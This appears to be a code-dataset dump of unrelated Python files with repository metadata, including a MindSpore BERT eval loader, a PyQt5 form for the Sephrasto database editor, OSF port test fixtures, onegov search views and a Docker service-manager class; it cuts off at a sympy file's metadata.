padded_samples = [item for x in range(padded_num)] padded_ds = ds.PaddedDataset(padded_samples) eval_ds = data_set + padded_ds sampler = ds.DistributedSampler(num_shards=device_num, shard_id=rank, shuffle=False) eval_ds.use_sampler(sampler) else: eval_ds = ds.TFRecordDataset(data_files, schema_dir if schema_dir != "" else None, columns_list=["input_ids", "input_mask", "segment_ids", "next_sentence_labels", "masked_lm_positions", "masked_lm_ids", "masked_lm_weights"], num_shards=device_num, shard_id=rank, shard_equal_rows=True) type_cast_op = C.TypeCast(mstype.int32) eval_ds = eval_ds.map(input_columns="masked_lm_ids", operations=type_cast_op) eval_ds = eval_ds.map(input_columns="masked_lm_positions", operations=type_cast_op) eval_ds = eval_ds.map(input_columns="next_sentence_labels", operations=type_cast_op) eval_ds = eval_ds.map(input_columns="segment_ids", operations=type_cast_op) eval_ds = eval_ds.map(input_columns="input_mask", operations=type_cast_op) eval_ds = eval_ds.map(input_columns="input_ids", operations=type_cast_op) eval_ds = eval_ds.batch(batchsize, drop_remainder=True) print("eval data size: {}".format(eval_ds.get_dataset_size())) print("eval repeat count: {}".format(eval_ds.get_repeat_count())) return eval_ds
53.187755
118
0.646919
37e912ce87ee8c5913f42ac0adcd81c81f7ac03a
204
py
Python
0-notes/job-search/Cracking the Coding Interview/C10SortingSearching/questions/10.9-question.py
eengineergz/Lambda
1fe511f7ef550aed998b75c18a432abf6ab41c5f
[ "MIT" ]
null
null
null
0-notes/job-search/Cracking the Coding Interview/C10SortingSearching/questions/10.9-question.py
eengineergz/Lambda
1fe511f7ef550aed998b75c18a432abf6ab41c5f
[ "MIT" ]
null
null
null
0-notes/job-search/Cracking the Coding Interview/C10SortingSearching/questions/10.9-question.py
eengineergz/Lambda
1fe511f7ef550aed998b75c18a432abf6ab41c5f
[ "MIT" ]
null
null
null
# Sorted Matrix Search # Given a M x N matrix in which each row and each column is sorted in # ascending order, write a method to find an element. # time complexity: O() # space complexity: O()
22.666667
70
0.696078
53386f341aeb3359e2968df0094cb4508536cf56
11,559
py
Python
DatenbankMain.py
klnrdknt/Sephrasto
591224fe01825a169c21ebc6136533f282ce9a0b
[ "MIT" ]
15
2017-11-09T12:49:52.000Z
2022-03-06T12:18:48.000Z
DatenbankMain.py
klnrdknt/Sephrasto
591224fe01825a169c21ebc6136533f282ce9a0b
[ "MIT" ]
40
2018-02-01T21:32:01.000Z
2022-03-22T11:35:28.000Z
DatenbankMain.py
klnrdknt/Sephrasto
591224fe01825a169c21ebc6136533f282ce9a0b
[ "MIT" ]
13
2018-03-12T17:50:42.000Z
2022-03-06T12:21:41.000Z
# -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'DatenbankMain.ui' # # Created by: PyQt5 UI code generator 5.15.4 # # WARNING: Any manual changes made to this file will be lost when pyuic5 is # run again. Do not edit this file unless you know what you are doing. from PyQt5 import QtCore, QtGui, QtWidgets class Ui_Form(object): def setupUi(self, Form): Form.setObjectName("Form") Form.setWindowModality(QtCore.Qt.ApplicationModal) Form.resize(661, 555) self.gridLayout = QtWidgets.QGridLayout(Form) self.gridLayout.setObjectName("gridLayout") self.horizontalLayout_2 = QtWidgets.QHBoxLayout() self.horizontalLayout_2.setObjectName("horizontalLayout_2") self.verticalLayout = QtWidgets.QVBoxLayout() self.verticalLayout.setObjectName("verticalLayout") self.labelParameter = QtWidgets.QLabel(Form) self.labelParameter.setObjectName("labelParameter") self.verticalLayout.addWidget(self.labelParameter) self.nameFilterEdit = QtWidgets.QLineEdit(Form) self.nameFilterEdit.setObjectName("nameFilterEdit") self.verticalLayout.addWidget(self.nameFilterEdit) self.checkFilterTyp = QtWidgets.QCheckBox(Form) self.checkFilterTyp.setChecked(True) self.checkFilterTyp.setTristate(True) self.checkFilterTyp.setObjectName("checkFilterTyp") self.verticalLayout.addWidget(self.checkFilterTyp) self.verticalLayout_3 = QtWidgets.QVBoxLayout() self.verticalLayout_3.setContentsMargins(10, -1, -1, -1) self.verticalLayout_3.setObjectName("verticalLayout_3") self.showVorteile = QtWidgets.QCheckBox(Form) self.showVorteile.setChecked(True) self.showVorteile.setTristate(False) self.showVorteile.setObjectName("showVorteile") self.verticalLayout_3.addWidget(self.showVorteile) self.showFertigkeiten = QtWidgets.QCheckBox(Form) self.showFertigkeiten.setChecked(True) self.showFertigkeiten.setObjectName("showFertigkeiten") self.verticalLayout_3.addWidget(self.showFertigkeiten) self.showFreieFertigkeiten = QtWidgets.QCheckBox(Form) self.showFreieFertigkeiten.setChecked(True) self.showFreieFertigkeiten.setObjectName("showFreieFertigkeiten") self.verticalLayout_3.addWidget(self.showFreieFertigkeiten) self.showUebernatuerlicheFertigkeiten = QtWidgets.QCheckBox(Form) self.showUebernatuerlicheFertigkeiten.setMinimumSize(QtCore.QSize(200, 0)) self.showUebernatuerlicheFertigkeiten.setChecked(True) self.showUebernatuerlicheFertigkeiten.setObjectName("showUebernatuerlicheFertigkeiten") self.verticalLayout_3.addWidget(self.showUebernatuerlicheFertigkeiten) self.showTalente = QtWidgets.QCheckBox(Form) self.showTalente.setChecked(True) self.showTalente.setObjectName("showTalente") self.verticalLayout_3.addWidget(self.showTalente) self.showRuestungen = QtWidgets.QCheckBox(Form) self.showRuestungen.setChecked(True) self.showRuestungen.setObjectName("showRuestungen") self.verticalLayout_3.addWidget(self.showRuestungen) self.showWaffen = QtWidgets.QCheckBox(Form) self.showWaffen.setChecked(True) self.showWaffen.setObjectName("showWaffen") self.verticalLayout_3.addWidget(self.showWaffen) self.showWaffeneigenschaften = QtWidgets.QCheckBox(Form) self.showWaffeneigenschaften.setChecked(True) self.showWaffeneigenschaften.setObjectName("showWaffeneigenschaften") self.verticalLayout_3.addWidget(self.showWaffeneigenschaften) self.showManoever = QtWidgets.QCheckBox(Form) self.showManoever.setChecked(True) self.showManoever.setObjectName("showManoever") self.verticalLayout_3.addWidget(self.showManoever) self.verticalLayout.addLayout(self.verticalLayout_3) self.labelParameter1 = QtWidgets.QLabel(Form) self.labelParameter1.setObjectName("labelParameter1") self.verticalLayout.addWidget(self.labelParameter1) self.showDeleted = QtWidgets.QCheckBox(Form) self.showDeleted.setChecked(True) self.showDeleted.setObjectName("showDeleted") self.verticalLayout.addWidget(self.showDeleted) self.showUserAdded = QtWidgets.QCheckBox(Form) self.showUserAdded.setChecked(False) self.showUserAdded.setObjectName("showUserAdded") self.verticalLayout.addWidget(self.showUserAdded) spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding) self.verticalLayout.addItem(spacerItem) self.buttonCloseDB = QtWidgets.QPushButton(Form) self.buttonCloseDB.setMinimumSize(QtCore.QSize(0, 25)) self.buttonCloseDB.setObjectName("buttonCloseDB") self.verticalLayout.addWidget(self.buttonCloseDB) self.buttonLoadDB = QtWidgets.QPushButton(Form) self.buttonLoadDB.setMinimumSize(QtCore.QSize(0, 25)) self.buttonLoadDB.setObjectName("buttonLoadDB") self.verticalLayout.addWidget(self.buttonLoadDB) self.buttonSaveDB = QtWidgets.QPushButton(Form) self.buttonSaveDB.setMinimumSize(QtCore.QSize(0, 25)) self.buttonSaveDB.setObjectName("buttonSaveDB") self.verticalLayout.addWidget(self.buttonSaveDB) self.buttonQuicksave = QtWidgets.QPushButton(Form) self.buttonQuicksave.setMinimumSize(QtCore.QSize(0, 25)) self.buttonQuicksave.setObjectName("buttonQuicksave") self.verticalLayout.addWidget(self.buttonQuicksave) self.horizontalLayout_2.addLayout(self.verticalLayout) self.verticalLayout_2 = QtWidgets.QVBoxLayout() self.verticalLayout_2.setObjectName("verticalLayout_2") self.listDatenbank = QtWidgets.QListView(Form) self.listDatenbank.setObjectName("listDatenbank") self.verticalLayout_2.addWidget(self.listDatenbank) self.horizontalLayout = QtWidgets.QHBoxLayout() self.horizontalLayout.setObjectName("horizontalLayout") spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout.addItem(spacerItem1) self.buttonHinzufuegen = QtWidgets.QPushButton(Form) self.buttonHinzufuegen.setMinimumSize(QtCore.QSize(0, 25)) self.buttonHinzufuegen.setObjectName("buttonHinzufuegen") self.horizontalLayout.addWidget(self.buttonHinzufuegen) self.buttonEditieren = QtWidgets.QPushButton(Form) self.buttonEditieren.setMinimumSize(QtCore.QSize(0, 25)) self.buttonEditieren.setObjectName("buttonEditieren") self.horizontalLayout.addWidget(self.buttonEditieren) self.buttonDuplizieren = QtWidgets.QPushButton(Form) self.buttonDuplizieren.setMinimumSize(QtCore.QSize(0, 25)) self.buttonDuplizieren.setObjectName("buttonDuplizieren") self.horizontalLayout.addWidget(self.buttonDuplizieren) self.buttonLoeschen = QtWidgets.QPushButton(Form) self.buttonLoeschen.setMinimumSize(QtCore.QSize(0, 25)) self.buttonLoeschen.setObjectName("buttonLoeschen") self.horizontalLayout.addWidget(self.buttonLoeschen) self.buttonWiederherstellen = QtWidgets.QPushButton(Form) self.buttonWiederherstellen.setMinimumSize(QtCore.QSize(0, 25)) self.buttonWiederherstellen.setVisible(False) self.buttonWiederherstellen.setObjectName("buttonWiederherstellen") self.horizontalLayout.addWidget(self.buttonWiederherstellen) self.verticalLayout_2.addLayout(self.horizontalLayout) self.horizontalLayout_2.addLayout(self.verticalLayout_2) self.gridLayout.addLayout(self.horizontalLayout_2, 0, 0, 1, 1) self.retranslateUi(Form) QtCore.QMetaObject.connectSlotsByName(Form) Form.setTabOrder(self.nameFilterEdit, self.checkFilterTyp) Form.setTabOrder(self.checkFilterTyp, self.showVorteile) Form.setTabOrder(self.showVorteile, self.showFertigkeiten) Form.setTabOrder(self.showFertigkeiten, self.showFreieFertigkeiten) Form.setTabOrder(self.showFreieFertigkeiten, self.showUebernatuerlicheFertigkeiten) Form.setTabOrder(self.showUebernatuerlicheFertigkeiten, self.showTalente) Form.setTabOrder(self.showTalente, self.showRuestungen) Form.setTabOrder(self.showRuestungen, self.showWaffen) Form.setTabOrder(self.showWaffen, self.showWaffeneigenschaften) Form.setTabOrder(self.showWaffeneigenschaften, self.showManoever) Form.setTabOrder(self.showManoever, self.showDeleted) Form.setTabOrder(self.showDeleted, self.showUserAdded) Form.setTabOrder(self.showUserAdded, self.buttonCloseDB) Form.setTabOrder(self.buttonCloseDB, self.buttonLoadDB) Form.setTabOrder(self.buttonLoadDB, self.buttonSaveDB) Form.setTabOrder(self.buttonSaveDB, self.buttonQuicksave) Form.setTabOrder(self.buttonQuicksave, self.listDatenbank) Form.setTabOrder(self.listDatenbank, self.buttonHinzufuegen) Form.setTabOrder(self.buttonHinzufuegen, self.buttonEditieren) Form.setTabOrder(self.buttonEditieren, self.buttonDuplizieren) Form.setTabOrder(self.buttonDuplizieren, self.buttonLoeschen) def retranslateUi(self, Form): _translate = QtCore.QCoreApplication.translate Form.setWindowTitle(_translate("Form", "Sephrasto - Datenbank-Editor")) self.labelParameter.setText(_translate("Form", "Filter nach Name:")) self.checkFilterTyp.setText(_translate("Form", "Filter nach Typ:")) self.showVorteile.setText(_translate("Form", "Vorteile")) self.showFertigkeiten.setText(_translate("Form", "Profane Fertigkeiten")) self.showFreieFertigkeiten.setText(_translate("Form", "Freie Fertigkeiten")) self.showUebernatuerlicheFertigkeiten.setText(_translate("Form", "Übernatürliche Fertigkeiten")) self.showTalente.setText(_translate("Form", "Talente")) self.showRuestungen.setText(_translate("Form", "Rüstungen")) self.showWaffen.setText(_translate("Form", "Waffen")) self.showWaffeneigenschaften.setText(_translate("Form", "Waffeneigenschaften")) self.showManoever.setText(_translate("Form", "Manöver / Modifikationen")) self.labelParameter1.setText(_translate("Form", "Filter nach Status:")) self.showDeleted.setText(_translate("Form", "Gelöschte Standardelemente")) self.showUserAdded.setText(_translate("Form", "Nur eigene Änderungen")) self.buttonCloseDB.setText(_translate("Form", "Regelbasis schließen")) self.buttonLoadDB.setText(_translate("Form", "Regelbasis laden")) self.buttonSaveDB.setText(_translate("Form", "Regelbasis speichern als...")) self.buttonQuicksave.setText(_translate("Form", "Regelbasis speichern")) self.buttonHinzufuegen.setText(_translate("Form", "Hinzufügen")) self.buttonEditieren.setText(_translate("Form", "Editieren")) self.buttonDuplizieren.setText(_translate("Form", "Duplizieren")) self.buttonLoeschen.setText(_translate("Form", "Löschen")) self.buttonWiederherstellen.setText(_translate("Form", "Wiederherstellen")) if __name__ == "__main__": import sys app = QtWidgets.QApplication(sys.argv) Form = QtWidgets.QWidget() ui = Ui_Form() ui.setupUi(Form) Form.show() sys.exit(app.exec_())
57.222772
115
0.739597
fe76e00351d56b33b2ebb4f06640167dd513b4b7
2,727
py
Python
RDS/circle1_adapters_and_ports/port_openscienceframework/tests/constant.py
Sciebo-RDS/Sciebo-RDS
d71cf449ed045a2a7a049e2cb77c99fd5a9195bd
[ "MIT" ]
10
2020-06-24T08:22:24.000Z
2022-01-13T16:17:36.000Z
RDS/circle1_adapters_and_ports/port_openscienceframework/tests/constant.py
Sciebo-RDS/Sciebo-RDS
d71cf449ed045a2a7a049e2cb77c99fd5a9195bd
[ "MIT" ]
78
2020-01-23T14:32:06.000Z
2022-03-07T14:11:16.000Z
RDS/circle1_adapters_and_ports/port_openscienceframework/tests/constant.py
Sciebo-RDS/Sciebo-RDS
d71cf449ed045a2a7a049e2cb77c99fd5a9195bd
[ "MIT" ]
1
2020-06-24T08:33:48.000Z
2020-06-24T08:33:48.000Z
req = { "userId": "admin", "metadata": { "@context": [ "https://w3id.org/ro/crate/1.0/context", { "@vocab": "https://schema.org/", "osfcategory": "https://www.research-data-services.org/jsonld/osfcategory", "zenodocategory": "https://www.research-data-services.org/jsonld/zenodocategory", }, ], "@graph": [ { "@id": "ro-crate-metadata.json", "@type": "CreativeWork", "about": {"@id": "./"}, "identifier": "ro-crate-metadata.json", "conformsTo": {"@id": "https://w3id.org/ro/crate/1.0"}, "license": {"@id": "https://creativecommons.org/licenses/by-sa/3.0"}, "description": "Made with Describo: https://uts-eresearch.github.io/describo/", }, { "@type": "Dataset", "datePublished": "2020-09-29T22:00:00.000Z", "name": ["testtitle"], "description": ["Beispieltest. Ganz viel\n\nasd mit umbruch"], "creator": [ {"@id": "#edf6055e-9985-4dfe-9759-8f1aa640d396"}, {"@id": "#ac356e5f-fb71-400e-904e-a473c4fc890d"}, ], "zenodocategory": "publication/thesis", "osfcategory": "analysis", "@id": "./", }, { "@type": "Person", "@reverse": {"creator": [{"@id": "./"}]}, "name": "Peter Heiss", "familyName": "Heiss", "givenName": "Peter", "affiliation": [{"@id": "#4bafacfd-e123-44dc-90b9-63f974f85694"}], "@id": "#edf6055e-9985-4dfe-9759-8f1aa640d396", }, { "@type": "Organization", "name": "WWU", "@reverse": { "affiliation": [{"@id": "#edf6055e-9985-4dfe-9759-8f1aa640d396"}] }, "@id": "#4bafacfd-e123-44dc-90b9-63f974f85694", }, { "@type": "Person", "name": "Jens Stegmann", "familyName": "Stegmann", "givenName": "Jens", "email": "", "@reverse": {"creator": [{"@id": "./"}]}, "@id": "#ac356e5f-fb71-400e-904e-a473c4fc890d", }, ], }, } result = { "data": { "type": "nodes", "attributes": { "description": "Beispieltest. Ganz viel asd mit umbruch", "category": "analysis", "title": "testtitle", }, } }
36.36
97
0.409974
feb872640410fc1f83718fda29c0235d78d75632
349
py
Python
Python/Courses/Python-Tutorials.Telusko/02.Miscellaneous/17.01-Custom-Iterator.py
shihab4t/Books-Code
b637b6b2ad42e11faf87d29047311160fe3b2490
[ "Unlicense" ]
null
null
null
Python/Courses/Python-Tutorials.Telusko/02.Miscellaneous/17.01-Custom-Iterator.py
shihab4t/Books-Code
b637b6b2ad42e11faf87d29047311160fe3b2490
[ "Unlicense" ]
null
null
null
Python/Courses/Python-Tutorials.Telusko/02.Miscellaneous/17.01-Custom-Iterator.py
shihab4t/Books-Code
b637b6b2ad42e11faf87d29047311160fe3b2490
[ "Unlicense" ]
null
null
null
class TopTen: def __init__(self): self.num = 1 def __iter__(self): return self def __next__(self): if self.num <= 10: val = self.num self.num += 1 return val else: raise StopIteration values = TopTen() print(next(values)) for i in values: print(i)
15.863636
31
0.512894
22a659a330aa51abf44dc2d92f08f0f29ee6700f
513
py
Python
src/onegov/fsi/views/search.py
politbuero-kampagnen/onegov-cloud
20148bf321b71f617b64376fe7249b2b9b9c4aa9
[ "MIT" ]
null
null
null
src/onegov/fsi/views/search.py
politbuero-kampagnen/onegov-cloud
20148bf321b71f617b64376fe7249b2b9b9c4aa9
[ "MIT" ]
null
null
null
src/onegov/fsi/views/search.py
politbuero-kampagnen/onegov-cloud
20148bf321b71f617b64376fe7249b2b9b9c4aa9
[ "MIT" ]
null
null
null
from onegov.core.security import Personal from onegov.fsi import FsiApp from onegov.org.models import Search from onegov.org.views.search import search as search_view from onegov.org.views.search import suggestions as suggestions_view @FsiApp.html(model=Search, template='search.pt', permission=Personal) def search(self, request): return search_view(self, request) @FsiApp.json(model=Search, name='suggest', permission=Personal) def suggestions(self, request): return suggestions_view(self, request)
32.0625
69
0.80117
22df2e0e0527bd6381b3b4db13c33d2e8f7708b5
14,158
py
Python
workspace/cogrob/service_manager/model/docker_service.py
CogRob/Rorg
dbf9d849e150404c117f6f0062476d995cec7316
[ "BSD-3-Clause" ]
8
2019-05-07T02:30:58.000Z
2021-12-10T18:44:45.000Z
workspace/cogrob/service_manager/model/docker_service.py
CogRob/Rorg
dbf9d849e150404c117f6f0062476d995cec7316
[ "BSD-3-Clause" ]
1
2021-03-17T07:18:23.000Z
2021-03-17T07:18:23.000Z
workspace/cogrob/service_manager/model/docker_service.py
CogRob/Rorg
dbf9d849e150404c117f6f0062476d995cec7316
[ "BSD-3-Clause" ]
2
2019-05-21T14:15:24.000Z
2022-02-09T12:50:24.000Z
# Copyright (c) 2019, The Regents of the University of California # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # * Neither the name of the University of California nor the # names of its contributors may be used to endorse or promote products # derived from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OF THE UNIVERSITY OF CALIFORNIA # BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. from absl import flags from absl import logging from cogrob.service_manager.model import base_service from cogrob.service_manager.model import delayed_action from cogrob.service_manager.model import docker_py from cogrob.service_manager.model import fake_docker_py from cogrob.service_manager.model import service_id from cogrob.service_manager.model import service_request from cogrob.service_manager.proto import service_options_pb2 from cogrob.service_manager.proto import service_state_pb2 from cogrob.service_manager.util import docker_options_pb_to_py from cogrob.service_manager.util import errors import datetime import dateutil.parser import docker import random import threading import time flags.DEFINE_string( "docker_container_name_prefix", "rorg__", "Name prefix for docker containers.") flags.DEFINE_float( "docker_stats_valid_time", 5.0, "Time (in seconds) that one docker stats read will be valid.") FLAGS = flags.FLAGS ServiceId = service_id.ServiceId ServiceOptions = service_options_pb2.ServiceOptions ServiceStatePb = service_state_pb2.ServiceState ServiceRequest = service_request.ServiceRequest ServiceRequestId = service_request.ServiceRequestId class DockerService(base_service.BaseService): def __init__(self, manager): super(DockerService, self).__init__(manager=manager) self._docker_py_client = None self._docker_py_inst = None self._docker_stats = None @staticmethod def RestoreFromProto(service_state_pb, manager): result = DockerService(manager=manager) new_pb = ServiceStatePb() new_pb.CopyFrom(service_state_pb) result.SetStateProto(new_pb) if result.IsInSimulation(): result._docker_py_client = fake_docker_py.GetGlobalFakeDockerClient() else: result._docker_py_client = docker_py.GetGlobalDockerClient() result._docker_py_inst = result._docker_py_client.GetContainer( result._GetContainerName()) return result def _GetContainerName(self): return (FLAGS.docker_container_name_prefix + "__".join(self.GetServiceId().namespace) + "_" + self.GetServiceId().name) @staticmethod def _CheckServiceOption(pb_service_option): assert pb_service_option.type == service_options_pb2.SERVICE_TYPE_DOCKER docker_options = pb_service_option.docker_service_options if docker_options.HasField("auto_remove") and docker_options.auto_remove: raise errors.ServiceUnsupportedOptionsError( "DockerService: auto_remove cannot be true.") if docker_options.HasField("remove") and docker_options.remove: raise errors.ServiceUnsupportedOptionsError( "DockerService: remove cannot be true.") @staticmethod def CreateFromServiceOptionsPb(pb_service_option, manager): assert pb_service_option.type == service_options_pb2.SERVICE_TYPE_DOCKER pb_service_state = ServiceStatePb() pb_service_state.id.CopyFrom(pb_service_option.id) pb_service_state.type = pb_service_option.type pb_service_state.options.CopyFrom(pb_service_option) pb_service_state.status = ServiceStatePb.STATUS_STOPPED result = DockerService(manager=manager) result.SetStateProto(pb_service_state) # TODO(shengye): Check the parameters and fill in the default parameters. docker_py_args = docker_options_pb_to_py.DockerOptionsPbToDict( result.GetStateProto().options.docker_service_options.container_options) docker_py_args["name"] = result._GetContainerName() # TODO(shengye): Some parameter need to be converted to docker-py structures options_to_remove = ["stdout", "stderr", "remove"] for opt_to_rm_name in options_to_remove: if opt_to_rm_name in docker_py_args: docker_py_args.pop(opt_to_rm_name) if result.IsInSimulation(): result._docker_py_client = fake_docker_py.GetGlobalFakeDockerClient() else: result._docker_py_client = docker_py.GetGlobalDockerClient() # FIXME(shengye): Pull image from registry. result._docker_py_inst = result._docker_py_client.CreateContainer( **docker_py_args) return result def Update(self, new_options): # TODO(shengye): When we decide to implement this Update function, # we should check and only update those parameters that can be updated # online # TODO(shengye): We can also have a flag that only recreates the underlying # docker-py object, without touch anything else. previous_status = self.GetStateProto().status self.DeactivateSelf(force=True) self._RemoveContainer() self.GetStateProto().options.CopyFrom(new_options) docker_py_args = docker_options_pb_to_py.DockerOptionsPbToDict( self.GetStateProto().options.docker_service_options.container_options) docker_py_args["name"] = self._GetContainerName() # TODO(shengye): Some parameter need to be converted to docker-py structures options_to_remove = ["stdout", "stderr", "remove"] for opt_to_rm_name in options_to_remove: if opt_to_rm_name in docker_py_args: docker_py_args.pop(opt_to_rm_name) if self.IsInSimulation(): self._docker_py_client = fake_docker_py.GetGlobalFakeDockerClient() else: self._docker_py_client = docker_py.GetGlobalDockerClient() # FIXME(shengye): Pull image from registry. self._docker_py_inst = self._docker_py_client.CreateContainer( **docker_py_args) if previous_status == ServiceStatePb.STATUS_ACTIVE: self.ActivateSelf() def Remove(self): # Here we cancel all the requests this service sent and remove self from the # manager. self.DeactivateSelf(force=True) self._RemoveContainer() self._manager.RemoveService(self.GetServiceId()) def ActivateSelf(self): # If current state is stopped, set it to active and generate a request, and # send to all related services. if self.IsActive(): logging.info("No need to activate service: %s, already active", str(self.GetServiceId())) return [] logging.info("Activating service: %s", str(self.GetServiceId())) self._docker_py_inst.Start() self.GetStateProto().status = ServiceStatePb.STATUS_ACTIVE self.GetStateProto().docker_service_state.status = ( service_state_pb2.DockerServiceState.DOCKER_STATUS_ACTIVE) all_delayed_actions = [] # Reactivate all implied requests. all_delayed_actions += ( self.ActRequestService(self.GetImpliedServiceRequest())) if self.GetStateProto().options.ready_detection_method.HasField( "wait_fixed_time"): all_delayed_actions.append( delayed_action.WaitUntilTimestamp(time.time() + self.GetStateProto().options.ready_detection_method.wait_fixed_time)) elif self.GetStateProto().options.ready_detection_method.HasField( "wait_for_prober"): raise errors.ServiceUnsupportedOptionsError( "{} has an unsupported wait_for_prober ReadyDetectionMethod".format( self.GetServiceId())) return all_delayed_actions def DeactivateSelf(self, force=False): if not self.IsActive(): logging.info("No need to deactivate service: %s, not active", str(self.GetServiceId())) return [] self.GetStateProto().status = ServiceStatePb.STATUS_TO_BE_STOPPED if not force and self.GetStateProto().options.disable_deactivate: raise errors.InternalError( "Cannot deactivate {}, disable_deactivate is true.".format( self.GetServiceId())) if not force and self.GetStateProto().requested_by_others: raise errors.InternalError( "Cannot deactivate {}, requested by services: {}.".format( self.GetServiceId(), ", ".join(map(str, self.GetStateProto().requested_by_others)))) logging.info("Deactivating service (releasing requests): %s", str(self.GetServiceId())) requests_by_self = [ServiceRequest.FromProto(x) for x in self.GetStateProto().requests_by_self] all_delayed_actions = [] for request_by_self in requests_by_self: # TODO(shengye): If it is pause, we can save these to somewhere else. all_delayed_actions += self.ActReleaseService(request_by_self.request_id) logging.info("Deactivating service (stopping docker): %s", str(self.GetServiceId())) self._docker_py_inst.Stop() self.GetStateProto().docker_service_state.status = ( service_state_pb2.DockerServiceState.DOCKER_STATUS_STOPPED) logging.info("Deactivated service: %s", str(self.GetServiceId())) self.GetStateProto().status = ServiceStatePb.STATUS_STOPPED # all_delayed_actions will always be [], which is OK for now. return all_delayed_actions def _RemoveContainer(self, force=True): self._docker_py_inst.Remove(force=force) def HandleRequestService(self, request): return self.HandleRequestServiceBasic(request) def HandleReleaseService(self, service_request_id): return self.HandleReleaseServiceBasic(service_request_id) def ForceRestart(self): self._docker_py_inst.Restart() def ActRequestService(self, service_request): return self.ActRequestServiceBasic(service_request) def ActReleaseService(self, service_request_id): return self.ActReleaseServiceBasic(service_request_id) def RefreshDockerStats(self): if self.IsInSimulation(): return None self._docker_stats = self._docker_py_inst.Stats(stream=False, decode=True) return self._docker_stats def GetDockerStats(self): stats_dict = self._docker_stats need_requery = False if stats_dict is None: need_requery = True else: read_time = dateutil.parser.parse(stats_dict["read"]) read_timestamp = (read_time - datetime.datetime( 1970, 1, 1, tzinfo=read_time.tzinfo)).total_seconds() if time.time() - read_timestamp > FLAGS.docker_stats_valid_time: need_requery = True if need_requery: self.RefreshDockerStats() stats_dict = self._docker_stats return stats_dict def GetCpuUsage(self): if not self.IsInSimulation(): # Query CPU usage from Docker, CPU usage is counted as number of logical # cores. (Number can be greater than 1.) # TODO(shengye): This read takes a lot of time, it should be asychronized try: stats_dict = self.GetDockerStats() if "percpu_usage" in stats_dict["cpu_stats"]["cpu_usage"]: cpu_count = len(stats_dict["cpu_stats"]["cpu_usage"]["percpu_usage"]) cpu_usage = (float( stats_dict["cpu_stats"]["cpu_usage"]["total_usage"] - stats_dict["precpu_stats"]["cpu_usage"]["total_usage"]) / (stats_dict["cpu_stats"]["system_cpu_usage"] - stats_dict["precpu_stats"]["system_cpu_usage"])) * cpu_count return cpu_usage else: return 0 except docker.errors.DockerException as e: raise errors.InternalError("Docker error: %s", str(e)) logging.error("Docker error: %s", str(e)) else: if not self.IsActive(): return 0 cpu_usage_pb = ( self.GetStateProto().options.simulation_parameters.cpu_usage) if cpu_usage_pb.HasField("guassian"): return random.gauss(cpu_usage_pb.guassian.mean, math.sqrt(cpu_usage_pb.guassian.variance)) elif cpu_usage_pb.HasField("fixed_value"): return cpu_usage_pb.fixed_value else: return None def GetMemoryUsage(self): if not self.IsInSimulation(): # Query memory usage from Docker, memory usage is counted in bytes. # TODO(shengye): This read takes a lot of time, it should be asychronized. try: stats_dict = self.GetDockerStats() if ("memory_stats" in stats_dict and "usage" in stats_dict["memory_stats"]): return stats_dict["memory_stats"]["usage"] return 0 except docker.errors.DockerException as e: raise errors.InternalError("Docker error: %s", str(e)) logging.error("Docker error: %s", str(e)) else: if not self.IsActive(): return 0 memory_usage_pb = ( self.GetStateProto().options.simulation_parameters.memory_usage) if memory_usage_pb.HasField("guassian"): return random.gauss(memory_usage_pb.guassian.mean, math.sqrt(memory_usage_pb.guassian.variance)) elif memory_usage_pb.HasField("fixed_value"): return memory_usage_pb.fixed_value else: return None
37.957105
80
0.727928
43000134c8e6e3af4141bab85388c271bc0ec983
972
py
Python
Server/admin/user.py
TateYdq/DietRegimen
66c88e84b7c4d9226db1d9567d300b1c6f7344b7
[ "MIT" ]
null
null
null
Server/admin/user.py
TateYdq/DietRegimen
66c88e84b7c4d9226db1d9567d300b1c6f7344b7
[ "MIT" ]
null
null
null
Server/admin/user.py
TateYdq/DietRegimen
66c88e84b7c4d9226db1d9567d300b1c6f7344b7
[ "MIT" ]
null
null
null
import requests import json from utils.config import * ss = requests.session() def addUser(): data = json.dumps({ "token":"1wqe213", "name":"123", "age":60, "gender":"female", "user_image_path":"test", "diseases_focus":"123" }) url = URL.format(env=cur_url, term=admin_url, action="/addUser") postReq(url,ss,data,admin_token) def updateUser(): data = json.dumps({ "token":"1wqe213", "user_id":8, "name":"uuuu", "age":63, "gender":"male", "user_image_path":"haha", "diseases_focus":"高血脂" }) url = URL.format(env=cur_url, term=admin_url, action="/updateUser") postReq(url,ss,data,admin_token) def createAllVoice(): url = URL.format(env=cur_url, term=admin_url, action="/createAllVoice") getReq(url, ss, "", admin_token) def main(): # addUser() # updateUser() createAllVoice() if __name__ == '__main__': main()
23.707317
75
0.585391
4318e5247f4b8d07d4dd70cfd77815483cc783dc
524
py
Python
misc/sympy_play/sympy_test.py
YoshimitsuMatsutaIe/hoge_flow_test
22e2e2ce043a3107bd06449f6f9958641293e414
[ "MIT" ]
null
null
null
misc/sympy_play/sympy_test.py
YoshimitsuMatsutaIe/hoge_flow_test
22e2e2ce043a3107bd06449f6f9958641293e414
